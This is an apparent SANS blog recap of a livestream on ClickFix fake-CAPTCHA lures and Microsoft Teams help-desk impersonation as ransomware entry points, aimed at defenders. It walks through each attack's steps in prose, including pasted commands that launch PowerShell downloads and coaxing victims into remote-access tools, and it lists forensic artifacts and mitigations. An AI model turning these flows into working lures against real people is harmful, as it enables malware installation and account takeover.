Stay Ahead of Ransomware: Initial Access via Evolving Social Engineering

In the April 2026 edition of the SANS Stay Ahead of Ransomware livestream, SANS instructors and authors Ryan Chapman and Mari DeGrazia delivered an in-depth technical discussion on two increasingly common initial access vectors: ClickFix and Microsoft Teams-based social engineering attacks.

Historically, the big three initial access vectors were phishing, remote access, and software vulnerabilities. However, in the last year, we have seen two techniques that ransomware-adjacent actors have started leveraging more: ClickFix and Microsoft Teams-based attacks. Their effectiveness and increasing use by ransomware operators make them critical threats to understand and defend against.

ClickFix Attacks

In the discussion, Mari covered how ClickFix works, as well as how to detect and prevent the threat. ClickFix emerged around 2024 and saw a 517% increase in 2025. This social engineering technique exploits user trust and unfamiliarity with Windows system functions to execute malicious commands. Unfortunately, the technique proves quite successful, including against organizations with strong user awareness training.

While we focused on Windows during this discussion, there are also variations out there that target Mac and Linux systems as well. Below is a diagram of a typical ClickFix attack flow in a Windows environment.

1. Initial Delivery: Victims receive links through compromised email accounts, shared SharePoint documents, compromised websites, SEO poisoning, or some other method. These are often from trusted sources like business partners or a compromised website. 
2. Fake CAPTCHA Page: Users are directed to a page mimicking a verification process, usually asking them to "prove they're human" or perhaps telling them something is broken and needs to be fixed, which is the initial style of lure that provides ClickFix its namesake. (i.e., “Click to fix!”) 
3. Clipboard Hijacking: JavaScript on the malicious page copies malicious commands to the user's clipboard. 
4. User Execution: Victims are instructed to press Windows+R, which opens the Windows Run dialog, then press Ctrl+V to paste the data to “prove they are human” or to “fix the problem”, and press Enter. This in reality is of course the malicious command. 
5. Payload Delivery: The pasted commands typically invoke PowerShell (either directly or eventually), which downloads and executes malware, leading to infostealers, backdoors, or ransomware deployment. Malicious commands may also leverage mshta.exe, curl.exe, or other native system tools with the ability to download and execute remote resources.

Detection

There are several artifacts an examiner can check to locate indications of this attack. Mari walks through each of these in the video and demonstrates some tools that you can use to parse them. This includes the RunMRU key in the registry, the Master File Table, PowerShell event logs, and Internet History. She also shared some Sigma rules that can be applied for detection and monitoring. 

Microsoft Teams-Based Social Engineering

Ryan dived into social engineering attacks based in Microsoft Teams. This technique gained prominence through the Black Basta ransomware group in 2024 and combines multiple social engineering elements:

1. Email Bombing: Threat actors flood the target's inbox with messages to create confusion (though variations we see in late 2025 and here in 2026 may skip this step). 
2. Teams Contact: Threat actors call or message victims via Teams, posing as an IT help desk. 
3. Establishing Trust: "Is your email acting weird? Let me help you fix that." If the email bombing was skipped, threat actors may use some other form of manipulation by providing seemingly personal information to prove “authenticity.” 
4. Remote Access: Victims are then guided to launch the windows Quick Assist tool or install a third-party Remote Monitoring and Management (RMM) tool. Some examples of these tools are AnyDesk, Atera, Splashtop, ConnectWise/ScreenConnect, and TeamViewer. This hands control to the threat actor under the guise of legitimate IT assistance.

How to Secure Microsoft Teams 

Ryan showed various resources on how organizations can prevent this type of attack, mentioning that the primary defense is to disable external access to Teams unless absolutely necessary. If external communication is required, organizations can use an allow list approach where only trusted partner domains are allowed. 

For both ClickFix and MS Teams attacks, training users is paramount.

Learning More and Looking Forward 

To learn more about ClickFix and Microsoft Teams-based attacks, we recommend you watch the April 7, 2026 episode of the SANS Stay Ahead of Ransomware livestream. Ryan also created two cheat sheets filled with links, tips, and tricks for addressing both ClickFix and MS Teams-based initial access threats:

• https://for528.com/clickfix-hunt
• https://for528.com/vish-teams

Join us on the first Tuesday of each month at 1:00 PM Eastern for the SANS Stay Ahead of Ransomware livestream. You can also review the SANS Stay Ahead of Ransomware livestream playlist on YouTube. 

Remember to check out our upcoming SANS training events, including FOR528: Ransomware and Cyber Extortion, where we dive into the technical details of preventing, detecting, and responding to ransomware and cyber extortion attacks. On the AI side of things, we also have FOR563: Applied AI for Digital Forensics and Incident Response: Leveraging Local Large Language Models, which teaches cyber defenders to leverage AI to aid in DFIR and IR investigations.